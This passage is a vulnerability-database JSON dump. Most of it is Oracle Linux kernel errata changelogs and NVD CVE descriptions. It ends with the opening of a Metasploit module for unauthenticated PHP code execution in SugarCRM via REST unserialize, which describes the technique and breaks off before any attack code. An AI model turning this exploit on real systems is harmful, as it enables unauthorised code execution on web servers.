Clear unused extra registers on syscall entrance (Konrad Rzeszutek Wilk) [Orabug: 27345850] {CVE-2017-5715}\n- x86/entry: Stuff RSB for entry to kernel for non-SMEP platform (Konrad Rzeszutek Wilk) [Orabug: 27345850] {CVE-2017-5715}\n- x86/mm: Only set IBPB when the new thread cannot ptrace current thread (Konrad Rzeszutek Wilk) [Orabug: 27345850] {CVE-2017-5715}\n- x86/mm: Set IBPB upon context switch (Tim Chen) [Orabug: 27345850] {CVE-2017-5715}\n- x86/idle: Disable IBRS when offlining cpu and re-enable on wakeup (Tim Chen) [Orabug: 27345850] {CVE-2017-5715}\n- x86/idle: Disable IBRS entering idle and enable it on wakeup (Tim Chen) [Orabug: 27345850] {CVE-2017-5715}\n- x86/spec_ctrl: save IBRS MSR value in paranoid_entry (Andrea Arcangeli) [Orabug: 27345850] {CVE-2017-5715}\n- *Scaffolding* x86/spec_ctrl: Add sysctl knobs to enable/disable SPEC_CTRL feature (Tim Chen) [Orabug: 27345850] {CVE-2017-5715}\n- x86/enter: Use IBRS on syscall and interrupts (Tim Chen) [Orabug: 27345850] {CVE-2017-5715}\n- x86: Add macro that does not save rax, rcx, rdx on stack to disable IBRS (Tim Chen) [Orabug: 27345850] {CVE-2017-5715}\n- x86/enter: MACROS to set/clear IBRS and set IBP (Tim Chen) [Orabug: 27345850] {CVE-2017-5715}\n- x86/feature: Report presence of IBPB and IBRS control (Tim Chen) [Orabug: 27345850] {CVE-2017-5715}\n- x86: Add STIBP feature enumeration (Konrad Rzeszutek Wilk) [Orabug: 27345850] {CVE-2017-5715}\n- x86/cpufeature: Add X86_FEATURE_IA32_ARCH_CAPS and X86_FEATURE_IBRS_ATT (Konrad Rzeszutek Wilk) [Orabug: 27345850] {CVE-2017-5715}\n- x86/feature: Enable the x86 feature to control (Tim Chen) [Orabug: 27345850] {CVE-2017-5715}\n[4.1.12-61.59.1]\n- nvme: merge probe_work and reset_work (Christoph Hellwig) [Orabug: 26984819] \n- nvme: only ignore hardware errors in nvme_create_io_queues (Christoph Hellwig) [Orabug: 26984819] \n- nvme: add NVME_SC_CANCELLED (Christoph Hellwig) [Orabug: 26984819]\n[4.1.12-61.58.1]\n- netlink: allow to listen 'all' netns (Nicolas Dichtel) [Orabug: 27098331] \n- netlink: rename private flags and states (Nicolas Dichtel) [Orabug: 27098331] \n- netns: use a spin_lock to protect nsid management (Nicolas Dichtel) [Orabug: 27098331] \n- netns: notify new nsid outside __peernet2id() (Nicolas Dichtel) [Orabug: 27098331] \n- netns: rename peernet2id() to peernet2id_alloc() (Nicolas Dichtel) [Orabug: 27098331] \n- netns: always provide the id to rtnl_net_fill() (Nicolas Dichtel) [Orabug: 27098331] \n- netns: returns always an id in __peernet2id() (Nicolas Dichtel) [Orabug: 27098331] \n- mm: fix new crash in unmapped_area_topdown() (Hugh Dickins) [Orabug: 26338222] {CVE-2017-1000364}\n- mm: larger stack guard gap, between vmas (Hugh Dickins) [Orabug: 26338222] {CVE-2017-1000364}\n- Revert 'SUNRPC: Refactor svc_set_num_threads()' (Kirtikar Kashyap) [Orabug: 26981903] \n- Revert 'NFSv4: Fix callback server shutdown' (Kirtikar Kashyap) [Orabug: 26981903]\n[4.1.12-61.57.1]\n- packet: fix tp_reserve race in packet_set_ring (Willem de Bruijn) [Orabug: 26681157] {CVE-2017-1000111}\n- sctp: do not inherit ipv6_{mc|ac|fl}_list from parent (Eric Dumazet) [Orabug: 26650879] {CVE-2017-9075}\n- x86/acpi: Prevent out of bound access caused by broken ACPI tables (Seunghun Han) [Orabug: 26643642] {CVE-2017-11473}\n- aio: mark AIO pseudo-fs noexec (Jann Horn) [Orabug: 26643594] {CVE-2016-10044}\n- mqueue: fix a use-after-free in sys_mq_notify() (Cong Wang) [Orabug: 26643552] {CVE-2017-11176}\n- ping: implement proper locking (Eric Dumazet) [Orabug: 26540282] {CVE-2017-2671}\n- nfsd: encoders mustnt use unitialized values in error cases (J. Bruce Fields) [Orabug: 26572912] {CVE-2017-8797}\n- nfsd: fix undefined behavior in nfsd4_layout_verify (Ari Kauppi) [Orabug: 26572912] {CVE-2017-8797}\n- vfs: Commit to never having exectuables on proc and sysfs. (Eric W. Biederman) [Orabug: 26643594] {CVE-2016-10044}\n- vfs, writeback: replace FS_CGROUP_WRITEBACK with SB_I_CGROUPWB (Tejun Heo) [Orabug: 26643594] {CVE-2016-10044}\n- fs/exec.c: account for argv/envp pointers (Kees Cook) [Orabug: 26403981] {CVE-2017-1000365} {CVE-2017-1000365}\n- NFSv4: Fix callback server shutdown (Trond Myklebust) [Orabug: 26403981] {CVE-2017-9059}\n- SUNRPC: Refactor svc_set_num_threads() (Trond Myklebust) [Orabug: 26403981] {CVE-2017-9059}\n[4.1.12-61.56.1]\n- mlx4_core: calculate log_num_mtt based on total system memory (Wei Lin Guay) [Orabug: 26867347] \n- xen/x86: Add interface for querying amount of host memory (Boris Ostrovsky) [Orabug: 26867347]\n[4.1.12-61.55.1]\n- Bluetooth: Properly check L2CAP config option output buffer length (Ben Seri) [Orabug: 26796420] {CVE-2017-1000251}\n- blk-mq: avoid re-initialize request which is failed in direct dispatch (Shaohua Li) [Orabug: 26752510] \n- xen-blkfront: fix mq start/stop race (Junxiao Bi) [Orabug: 26739166] [Orabug: 26739166] \n- Added IB diag counters from UEK2 (Chris Gray) [Orabug: 26088233]\n[4.1.12-61.54.1]\n- xen: fix bio vec merging (Roger Pau Monne) [Orabug: 26669479] [Orabug: 26645497] {CVE-2017-12134}\n[4.1.12-61.53.1]\n- dentry name snapshots (Al Viro) [Orabug: 26630810] {CVE-2017-7533}\n[4.1.12-61.52.1]\n- KEYS: Disallow keyrings beginning with '.' to be joined as session keyrings (David Howells) [Orabug: 26585991] {CVE-2016-9604} {CVE-2016-9604}\n- l2tp: fix racy SOCK_ZAPPED flag check in l2tp_ip{,6}_bind() (Guillaume Nault) [Orabug: 26586044] {CVE-2016-10200}\n- mnt: Add a per mount namespace limit on the number of mounts (Eric W. Biederman) [Orabug: 26585947] {CVE-2016-6213} {CVE-2016-6213}\n- ipv6: fix out of bound writes in __ip6_append_data() (Eric Dumazet) [Orabug: 26578193] {CVE-2017-9242}", "modified": "2018-01-27T00:00:00", "published": "2018-01-27T00:00:00", "id": "ELSA-2018-4021", "href": "http://linux.oracle.com/errata/ELSA-2018-4021.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:09", "bulletinFamily": "unix", "description": "[2.6.39-400.298.1]\n- ocfs2/dlm: ignore cleaning the migration mle that is inuse (xuejiufei) [Orabug: 23320090] \n- tty: Fix race in pty_write() leading to NULL deref (Todd Vierling) [Orabug: 24337879] \n- xen-netfront: cast grant table reference first to type int (Dongli Zhang) [Orabug: 25102637] \n- xen-netfront: do not cast grant table reference to signed short (Dongli Zhang) [Orabug: 25102637] \n- RDS: Print failed rdma op details if failure is remote access error (Rama Nichanamatlu) [Orabug: 25440316] \n- ping: implement proper locking (Eric Dumazet) [Orabug: 26540288] {CVE-2017-2671}\n- KEYS: fix dereferencing NULL payload with nonzero length (Eric Biggers) [Orabug: 26592013] \n- oracleasm: Copy the integrity descriptor (Martin K. Petersen) [Orabug: 26650039] \n- mm: Tighten x86 /dev/mem with zeroing reads (Kees Cook) [Orabug: 26675934] {CVE-2017-7889}\n- fs: __generic_file_splice_read retry lookup on AOP_TRUNCATED_PAGE (Abhi Das) [Orabug: 26797307] \n- xscore: add dma address check (Zhu Yanjun) [Orabug: 27058559] \n- more bio_map_user_iov() leak fixes (Al Viro) [Orabug: 27069045] {CVE-2017-12190}\n- fix unbalanced page refcounting in bio_map_user_iov (Vitaly Mayatskikh) [Orabug: 27069045] {CVE-2017-12190}\n- xsigo: [backport] Fix race in freeing aged Forwarding tables (Pradeep Gopanapalli) [Orabug: 24823234] \n- ocfs2: fix deadlock issue when taking inode lock at vfs entry points (Eric Ren) [Orabug: 25671723] \n- ocfs2/dlmglue: prepare tracking logic to avoid recursive cluster lock (Eric Ren) [Orabug: 25671723] \n- net/packet: fix overflow in check for tp_reserve (Andrey Konovalov) [Orabug: 26143563] {CVE-2017-7308}\n- net/packet: fix overflow in check for tp_frame_nr (Andrey Konovalov) [Orabug: 26143563] {CVE-2017-7308}\n- char: lp: fix possible integer overflow in lp_setup() (Willy Tarreau) [Orabug: 26403941] {CVE-2017-1000363}\n- ALSA: timer: Fix missing queue indices reset at SNDRV_TIMER_IOCTL_SELECT (Takashi Iwai) [Orabug: 26403958] {CVE-2017-1000380}\n- ALSA: timer: Fix race between read and ioctl (Takashi Iwai) [Orabug: 26403958] {CVE-2017-1000380}\n- ALSA: timer: fix NULL pointer dereference in read()/ioctl() race (Vegard Nossum) [Orabug: 26403958] {CVE-2017-1000380}\n- ALSA: timer: Fix negative queue usage by racy accesses (Takashi Iwai) [Orabug: 26403958] {CVE-2017-1000380}\n- ALSA: timer: Fix race at concurrent reads (Takashi Iwai) [Orabug: 26403958] {CVE-2017-1000380}\n- ALSA: timer: Fix race among timer ioctls (Takashi Iwai) [Orabug: 26403958] {CVE-2017-1000380}\n- ipv6: xfrm: Handle errors reported by xfrm6_find_1stfragopt() (Ben Hutchings) [Orabug: 26403974] {CVE-2017-9074}\n- ipv6: Check ip6_find_1stfragopt() return value properly. (David S. Miller) [Orabug: 26403974] {CVE-2017-9074}\n- ipv6: Prevent overrun when parsing v6 header options (Craig Gallek) [Orabug: 26403974] {CVE-2017-9074}\n- ipv6/dccp: do not inherit ipv6_mc_list from parent (WANG Cong) [Orabug: 26404007] {CVE-2017-9077}\n- aio: mark AIO pseudo-fs noexec (Jann Horn) [Orabug: 26643601] {CVE-2016-10044}\n- vfs: Commit to never having exectuables on proc and sysfs. (Eric W. Biederman) [Orabug: 26643601] {CVE-2016-10044}\n- vfs, writeback: replace FS_CGROUP_WRITEBACK with SB_I_CGROUPWB (Tejun Heo) [Orabug: 26643601] {CVE-2016-10044}\n- x86/acpi: Prevent out of bound access caused by broken ACPI tables (Seunghun Han) [Orabug: 26643652] {CVE-2017-11473}\n- sctp: do not inherit ipv6_{mc|ac|fl}_list from parent (Eric Dumazet) [Orabug: 26650889] {CVE-2017-9075}\n- saa7164: fix double fetch PCIe access condition (Steven Toth) [Orabug: 26675148] {CVE-2017-8831}\n- saa7164: fix sparse warnings (Hans Verkuil) [Orabug: 26675148] {CVE-2017-8831}\n- saa7164: get rid of warning: no previous prototype (Mauro Carvalho Chehab) [Orabug: 26675148] {CVE-2017-8831}\n- [scsi] lpfc 8.3.44: Fix kernel panics from corrupted ndlp (James Smart) [Orabug: 26765341] \n- timerfd: Protect the might cancel mechanism proper (Thomas Gleixner) [Orabug: 26899791] {CVE-2017-10661}\n- scsi: scsi_transport_iscsi: fix the issue that iscsi_if_rx doesn't parse nlmsg properly (Xin Long) [Orabug: 26988628] {CVE-2017-14489}\n- mqueue: fix a use-after-free in sys_mq_notify() (Cong Wang) [Orabug: 26643562] {CVE-2017-11176}\n- ipv6: avoid overflow of offset in ip6_find_1stfragopt (Sabrina Dubroca) [Orabug: 27011278] {CVE-2017-7542}\n- packet: fix tp_reserve race in packet_set_ring (Willem de Bruijn) [Orabug: 27002453] {CVE-2017-1000111}\n- mlx4_core: calculate log_mtt based on total system memory (Wei Lin Guay) [Orabug: 26867355] \n- xen/x86: Add interface for querying amount of host memory (Boris Ostrovsky) [Orabug: 26867355] \n- fs/binfmt_elf.c: fix bug in loading of PIE binaries (Michael Davidson) [Orabug: 26870958] {CVE-2017-1000253}\n- Bluetooth: Properly check L2CAP config option output buffer length (Ben Seri) [Orabug: 26796428] {CVE-2017-1000251}\n- xen: fix bio vec merging (Roger Pau Monne) [Orabug: 26645562] {CVE-2017-12134}\n- fs/exec.c: account for argv/envp pointers (Kees Cook) [Orabug: 26638926] {CVE-2017-1000365} {CVE-2017-1000365}\n- l2tp: fix racy SOCK_ZAPPED flag check in l2tp_ip{,6}_bind() (Guillaume Nault) [Orabug: 26586050] {CVE-2016-10200}\n- xfs: fix two memory leaks in xfs_attr_list.c error paths (Mateusz Guzik) [Orabug: 26586024] {CVE-2016-9685}\n- KEYS: Disallow keyrings beginning with '.' to be joined as session keyrings (David Howells) [Orabug: 26586002] {CVE-2016-9604}\n- ipv6: fix out of bound writes in __ip6_append_data() (Eric Dumazet) [Orabug: 26578202] {CVE-2017-9242}\n- selinux: quiet the filesystem labeling behavior message (Paul Moore) [Orabug: 25721485] \n- RDS/IB: active bonding port state fix for intfs added late (Mukesh Kacker) [Orabug: 25875426] \n- HID: hid-cypress: validate length of report (Greg Kroah-Hartman) [Orabug: 25891914] {CVE-2017-7273}\n- udf: Remove repeated loads blocksize (Jan Kara) [Orabug: 25905722] {CVE-2015-4167}\n- udf: Check length of extended attributes and allocation descriptors (Jan Kara) [Orabug: 25905722] {CVE-2015-4167}\n- udf: Verify i_size when loading inode (Jan Kara) [Orabug: 25905722] {CVE-2015-4167}\n- btrfs: drop unused parameter from btrfs_item_nr (Ross Kirk) [Orabug: 25948102] {CVE-2014-9710}\n- Btrfs: cleanup of function where fixup_low_keys() is called (Tsutomu Itoh) [Orabug: 25948102] {CVE-2014-9710}\n- Btrfs: remove unused argument of fixup_low_keys() (Tsutomu Itoh) [Orabug: 25948102] {CVE-2014-9710}\n- Btrfs: remove unused argument of btrfs_extend_item() (Tsutomu Itoh) [Orabug: 25948102] {CVE-2014-9710}\n- Btrfs: add support for asserts (Josef Bacik) [Orabug: 25948102] {CVE-2014-9710}\n- Btrfs: make xattr replace operations atomic (Filipe Manana) [Orabug: 25948102] {CVE-2014-9710}\n- net: validate the range we feed to iov_iter_init() in sys_sendto/sys_recvfrom (Al Viro) [Orabug: 25948149] {CVE-2015-2686}\n- xsigo: Compute node crash on FC failover (Joe Jin) [Orabug: 25965445] \n- PCI: Prevent VPD access for QLogic ISP2722 (Ethan Zhao) [Orabug: 25975513] \n- PCI: Prevent VPD access for buggy devices (Babu Moger) [Orabug: 25975513] \n- ipv4: try to cache dst_entries which would cause a redirect (Hannes Frederic Sowa) [Orabug: 26032377] {CVE-2015-1465}\n- mm: larger stack guard gap, between vmas (Hugh Dickins) [Orabug: 26326145] {CVE-2017-1000364}\n- nfsd: check for oversized NFSv2/v3 arguments (J. Bruce Fields) [Orabug: 26366024] {CVE-2017-7645}\n- dm mpath: allow ioctls to trigger pg init (Mikulas Patocka) [Orabug: 25645229] \n- xen/manage: Always freeze/thaw processes when suspend/resuming (Ross Lagerwall) [Orabug: 25795530] \n- lpfc cannot establish connection with targets that send PRLI under P2P mode (Joe Jin) [Orabug: 25955028]", "modified": "2017-12-08T00:00:00", "published": "2017-12-08T00:00:00", "id": "ELSA-2017-3658", "href": "http://linux.oracle.com/errata/ELSA-2017-3658.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:55", "bulletinFamily": "unix", "description": "kernel-uek\n[3.8.13-118.20.1]\n- tty: Fix race in pty_write() leading to NULL deref (Todd Vierling) [Orabug: 25392692] \n- ocfs2/dlm: ignore cleaning the migration mle that is inuse (xuejiufei) [Orabug: 26479780] \n- KEYS: fix dereferencing NULL payload with nonzero length (Eric Biggers) [Orabug: 26592025] \n- oracleasm: Copy the integrity descriptor (Martin K. Petersen) [Orabug: 26649818] \n- mm: Tighten x86 /dev/mem with zeroing reads (Kees Cook) [Orabug: 26675925] {CVE-2017-7889}\n- xscore: add dma address check (Zhu Yanjun) [Orabug: 27058468] \n- more bio_map_user_iov() leak fixes (Al Viro) [Orabug: 27069042] {CVE-2017-12190}\n- fix unbalanced page refcounting in bio_map_user_iov (Vitaly Mayatskikh) [Orabug: 27069042] {CVE-2017-12190}\n- nvme: Drop nvmeq->q_lock before dma_pool_alloc(), so as to prevent hard lockups (Aruna Ramakrishna) [Orabug: 25409587] \n- nvme: Handle PM1725 HIL reset (Martin K. Petersen) [Orabug: 26277600] \n- char: lp: fix possible integer overflow in lp_setup() (Willy Tarreau) [Orabug: 26403940] {CVE-2017-1000363}\n- ALSA: timer: Fix missing queue indices reset at SNDRV_TIMER_IOCTL_SELECT (Takashi Iwai) [Orabug: 26403956] {CVE-2017-1000380}\n- ALSA: timer: Fix race between read and ioctl (Takashi Iwai) [Orabug: 26403956] {CVE-2017-1000380}\n- ALSA: timer: fix NULL pointer dereference in read()/ioctl() race (Vegard Nossum) [Orabug: 26403956] {CVE-2017-1000380}\n- ALSA: timer: Fix negative queue usage by racy accesses (Takashi Iwai) [Orabug: 26403956] {CVE-2017-1000380}\n- ALSA: timer: Fix race at concurrent reads (Takashi Iwai) [Orabug: 26403956] {CVE-2017-1000380}\n- ALSA: timer: Fix race among timer ioctls (Takashi Iwai) [Orabug: 26403956] {CVE-2017-1000380}\n- ipv6/dccp: do not inherit ipv6_mc_list from parent (WANG Cong) [Orabug: 26404005] {CVE-2017-9077}\n- ocfs2: fix deadlock issue when taking inode lock at vfs entry points (Eric Ren) [Orabug: 26427126] \n- ocfs2/dlmglue: prepare tracking logic to avoid recursive cluster lock (Eric Ren) [Orabug: 26427126] \n- ping: implement proper locking (Eric Dumazet) [Orabug: 26540286] {CVE-2017-2671}\n- aio: mark AIO pseudo-fs noexec (Jann Horn) [Orabug: 26643598] {CVE-2016-10044}\n- vfs: Commit to never having exectuables on proc and sysfs. (Eric W. Biederman) [Orabug: 26643598] {CVE-2016-10044}\n- vfs, writeback: replace FS_CGROUP_WRITEBACK with SB_I_CGROUPWB (Tejun Heo) [Orabug: 26643598] {CVE-2016-10044}\n- x86/acpi: Prevent out of bound access caused by broken ACPI tables (Seunghun Han) [Orabug: 26643645] {CVE-2017-11473}\n- sctp: do not inherit ipv6_{mc|ac|fl}_list from parent (Eric Dumazet) [Orabug: 26650883] {CVE-2017-9075}\n- [media] saa7164: fix double fetch PCIe access condition (Steven Toth) [Orabug: 26675142] {CVE-2017-8831}\n- [media] saa7164: fix sparse warnings (Hans Verkuil) [Orabug: 26675142] {CVE-2017-8831}\n- fs: __generic_file_splice_read retry lookup on AOP_TRUNCATED_PAGE (Abhi Das) [Orabug: 26797306] \n- timerfd: Protect the might cancel mechanism proper (Thomas Gleixner) [Orabug: 26899787] {CVE-2017-10661}\n- scsi: scsi_transport_iscsi: fix the issue that iscsi_if_rx doesn't parse nlmsg properly (Xin Long) [Orabug: 26988627] {CVE-2017-14489}\n- mqueue: fix a use-after-free in sys_mq_notify() (Cong Wang) [Orabug: 26643556] {CVE-2017-11176}\n- ipv6: avoid overflow of offset in ip6_find_1stfragopt (Sabrina Dubroca) [Orabug: 27011273] {CVE-2017-7542}\n- packet: fix tp_reserve race in packet_set_ring (Willem de Bruijn) [Orabug: 27002450] {CVE-2017-1000111}\n- mlx4_core: calculate log_num_mtt based on total system memory (Wei Lin Guay) [Orabug: 26883934] \n- xen/x86: Add interface for querying amount of host memory (Boris Ostrovsky) [Orabug: 26883934] \n- Bluetooth: Properly check L2CAP config option output buffer length (Ben Seri) [Orabug: 26796364] {CVE-2017-1000251}\n- xen: fix bio vec merging (Roger Pau Monne) [Orabug: 26645550] {CVE-2017-12134}\n- fs/exec.c: account for argv/envp pointers (Kees Cook) [Orabug: 26638921] {CVE-2017-1000365} {CVE-2017-1000365}\n- l2tp: fix racy SOCK_ZAPPED flag check in l2tp_ip{,6}_bind() (Guillaume Nault) [Orabug: 26586047] {CVE-2016-10200}\n- xfs: fix two memory leaks in xfs_attr_list.c error paths (Mateusz Guzik) [Orabug: 26586022] {CVE-2016-9685}\n- KEYS: Disallow keyrings beginning with '.' to be joined as session keyrings (David Howells) [Orabug: 26585994] {CVE-2016-9604}\n- ipv6: fix out of bound writes in __ip6_append_data() (Eric Dumazet) [Orabug: 26578198] {CVE-2017-9242}\n- posix_acl: Clear SGID bit when setting file permissions (Jan Kara) [Orabug: 25507344] {CVE-2016-7097} {CVE-2016-7097}\n- nfsd: check for oversized NFSv2/v3 arguments (J. Bruce Fields) [Orabug: 26366022] {CVE-2017-7645}", "modified": "2017-12-07T00:00:00", "published": "2017-12-07T00:00:00", "id": "ELSA-2017-3657", "href": "http://linux.oracle.com/errata/ELSA-2017-3657.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:39:28", "bulletinFamily": "unix", "description": "[2.6.39-400.297.12]\n- xsigo: [backport] Fix race in freeing aged Forwarding tables (Pradeep Gopanapalli) [Orabug: 24823234] \n- ocfs2: fix deadlock issue when taking inode lock at vfs entry points (Eric Ren) [Orabug: 25671723] \n- ocfs2/dlmglue: prepare tracking logic to avoid recursive cluster lock (Eric Ren) [Orabug: 25671723] \n- net/packet: fix overflow in check for tp_reserve (Andrey Konovalov) [Orabug: 26143563] {CVE-2017-7308}\n- net/packet: fix overflow in check for tp_frame_nr (Andrey Konovalov) [Orabug: 26143563] {CVE-2017-7308}\n- char: lp: fix possible integer overflow in lp_setup() (Willy Tarreau) [Orabug: 26403941] {CVE-2017-1000363}\n- ALSA: timer: Fix missing queue indices reset at SNDRV_TIMER_IOCTL_SELECT (Takashi Iwai) [Orabug: 26403958] {CVE-2017-1000380}\n- ALSA: timer: Fix race between read and ioctl (Takashi Iwai) [Orabug: 26403958] {CVE-2017-1000380}\n- ALSA: timer: fix NULL pointer dereference in read()/ioctl() race (Vegard Nossum) [Orabug: 26403958] {CVE-2017-1000380}\n- ALSA: timer: Fix negative queue usage by racy accesses (Takashi Iwai) [Orabug: 26403958] {CVE-2017-1000380}\n- ALSA: timer: Fix race at concurrent reads (Takashi Iwai) [Orabug: 26403958] {CVE-2017-1000380}\n- ALSA: timer: Fix race among timer ioctls (Takashi Iwai) [Orabug: 26403958] {CVE-2017-1000380}\n- ipv6: xfrm: Handle errors reported by xfrm6_find_1stfragopt() (Ben Hutchings) [Orabug: 26403974] {CVE-2017-9074}\n- ipv6: Check ip6_find_1stfragopt() return value properly. (David S. Miller) [Orabug: 26403974] {CVE-2017-9074}\n- ipv6: Prevent overrun when parsing v6 header options (Craig Gallek) [Orabug: 26403974] {CVE-2017-9074}\n- ipv6/dccp: do not inherit ipv6_mc_list from parent (WANG Cong) [Orabug: 26404007] {CVE-2017-9077}\n- aio: mark AIO pseudo-fs noexec (Jann Horn) [Orabug: 26643601] {CVE-2016-10044}\n- vfs: Commit to never having exectuables on proc and sysfs. (Eric W. Biederman) [Orabug: 26643601] {CVE-2016-10044}\n- vfs, writeback: replace FS_CGROUP_WRITEBACK with SB_I_CGROUPWB (Tejun Heo) [Orabug: 26643601] {CVE-2016-10044}\n- x86/acpi: Prevent out of bound access caused by broken ACPI tables (Seunghun Han) [Orabug: 26643652] {CVE-2017-11473}\n- sctp: do not inherit ipv6_{mc|ac|fl}_list from parent (Eric Dumazet) [Orabug: 26650889] {CVE-2017-9075}\n- saa7164: fix double fetch PCIe access condition (Steven Toth) [Orabug: 26675148] {CVE-2017-8831}\n- saa7164: fix sparse warnings (Hans Verkuil) [Orabug: 26675148] {CVE-2017-8831}\n- saa7164: get rid of warning: no previous prototype (Mauro Carvalho Chehab) [Orabug: 26675148] {CVE-2017-8831}\n- [scsi] lpfc 8.3.44: Fix kernel panics from corrupted ndlp (James Smart) [Orabug: 26765341] \n- timerfd: Protect the might cancel mechanism proper (Thomas Gleixner) [Orabug: 26899791] {CVE-2017-10661}\n- scsi: scsi_transport_iscsi: fix the issue that iscsi_if_rx doesn't parse nlmsg properly (Xin Long) [Orabug: 26988628] {CVE-2017-14489}", "modified": "2017-11-02T00:00:00", "published": "2017-11-02T00:00:00", "id": "ELSA-2017-3637", "href": "http://linux.oracle.com/errata/ELSA-2017-3637.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:51", "bulletinFamily": "unix", "description": "kernel-uek\n[3.8.13-118.19.12]\n- nvme: Drop nvmeq->q_lock before dma_pool_alloc(), so as to prevent hard lockups (Aruna Ramakrishna) [Orabug: 25409587]\n[3.8.13-118.19.11]\n- nvme: Handle PM1725 HIL reset (Martin K. Petersen) [Orabug: 26277600] \n- char: lp: fix possible integer overflow in lp_setup() (Willy Tarreau) [Orabug: 26403940] {CVE-2017-1000363}\n- ALSA: timer: Fix missing queue indices reset at SNDRV_TIMER_IOCTL_SELECT (Takashi Iwai) [Orabug: 26403956] {CVE-2017-1000380}\n- ALSA: timer: Fix race between read and ioctl (Takashi Iwai) [Orabug: 26403956] {CVE-2017-1000380}\n- ALSA: timer: fix NULL pointer dereference in read()/ioctl() race (Vegard Nossum) [Orabug: 26403956] {CVE-2017-1000380}\n- ALSA: timer: Fix negative queue usage by racy accesses (Takashi Iwai) [Orabug: 26403956] {CVE-2017-1000380}\n- ALSA: timer: Fix race at concurrent reads (Takashi Iwai) [Orabug: 26403956] {CVE-2017-1000380}\n- ALSA: timer: Fix race among timer ioctls (Takashi Iwai) [Orabug: 26403956] {CVE-2017-1000380}\n- ipv6/dccp: do not inherit ipv6_mc_list from parent (WANG Cong) [Orabug: 26404005] {CVE-2017-9077}\n- ocfs2: fix deadlock issue when taking inode lock at vfs entry points (Eric Ren) [Orabug: 26427126] \n- ocfs2/dlmglue: prepare tracking logic to avoid recursive cluster lock (Eric Ren) [Orabug: 26427126] \n- ping: implement proper locking (Eric Dumazet) [Orabug: 26540286] {CVE-2017-2671}\n- aio: mark AIO pseudo-fs noexec (Jann Horn) [Orabug: 26643598] {CVE-2016-10044}\n- vfs: Commit to never having exectuables on proc and sysfs. (Eric W. Biederman) [Orabug: 26643598] {CVE-2016-10044}\n- vfs, writeback: replace FS_CGROUP_WRITEBACK with SB_I_CGROUPWB (Tejun Heo) [Orabug: 26643598] {CVE-2016-10044}\n- x86/acpi: Prevent out of bound access caused by broken ACPI tables (Seunghun Han) [Orabug: 26643645] {CVE-2017-11473}\n- sctp: do not inherit ipv6_{mc|ac|fl}_list from parent (Eric Dumazet) [Orabug: 26650883] {CVE-2017-9075}\n- [media] saa7164: fix double fetch PCIe access condition (Steven Toth) [Orabug: 26675142] {CVE-2017-8831}\n- [media] saa7164: fix sparse warnings (Hans Verkuil) [Orabug: 26675142] {CVE-2017-8831}\n- fs: __generic_file_splice_read retry lookup on AOP_TRUNCATED_PAGE (Abhi Das) [Orabug: 26797306] \n- timerfd: Protect the might cancel mechanism proper (Thomas Gleixner) [Orabug: 26899787] {CVE-2017-10661}\n- scsi: scsi_transport_iscsi: fix the issue that iscsi_if_rx doesn't parse nlmsg properly (Xin Long) [Orabug: 26988627] {CVE-2017-14489}", "modified": "2017-11-02T00:00:00", "published": "2017-11-02T00:00:00", "id": "ELSA-2017-3636", "href": "http://linux.oracle.com/errata/ELSA-2017-3636.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2019-05-29T18:15:32", "bulletinFamily": "NVD", "description": "The aio_mount function in fs/aio.c in the Linux kernel before 4.7.7 does not properly restrict execute access, which makes it easier for local users to bypass intended SELinux W^X policy restrictions, and consequently gain privileges, via an io_setup system call.", "modified": "2017-07-25T01:29:00", "id": "CVE-2016-10044", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-10044", "published": "2017-02-07T07:59:00", "title": "CVE-2016-10044", "type": "cve", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:15:41", "bulletinFamily": "NVD", "description": "Multiple memory leaks in error paths in fs/xfs/xfs_attr_list.c in the Linux kernel before 4.5.1 allow local users to cause a denial of service (memory consumption) via crafted XFS filesystem operations.", "modified": "2018-01-05T02:31:00", "id": "CVE-2016-9685", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-9685", "published": "2016-12-28T07:59:00", "title": "CVE-2016-9685", "type": "cve", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}], "metasploit": [{"lastseen": "2019-12-13T03:58:47", "bulletinFamily": "exploit", "description": "This module exploits a PHP Object Injection vulnerability in SugarCRM CE <= 6.5.23 which could be abused to allow unauthenticated users to execute arbitrary PHP code with the permissions of the webserver. The dangerous unserialize() call exists in the '/service/core/REST/SugarRestSerialize.php' script. The exploit abuses the __destruct() method from the SugarCacheFile class to write arbitrary PHP code into the /custom directory.\n", "modified": "2017-07-24T13:26:21", "published": "2016-09-06T23:58:41", "id": "MSF:EXPLOIT/UNIX/WEBAPP/SUGARCRM_REST_UNSERIALIZE_EXEC", "href": "", "type": "metasploit", "title": "SugarCRM REST Unserialize PHP Code Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'SugarCRM REST Unserialize PHP Code Execution',\n 'Description' => %q{\n This module exploits a PHP Object Injection vulnerability in SugarCRM CE <= 6.5.23\n which could be abused to allow unauthenticated users to execute arbitrary PHP code with\n the permissions of the webserver. The dangerous unserialize() call exists in the\n '/service/core/REST/SugarRestSerialize.php' script. The exploit abuses the __destruct()\n method from the SugarCacheFile class to write arbitrary PHP code into the /custom directory.\n },\n 'Author' => 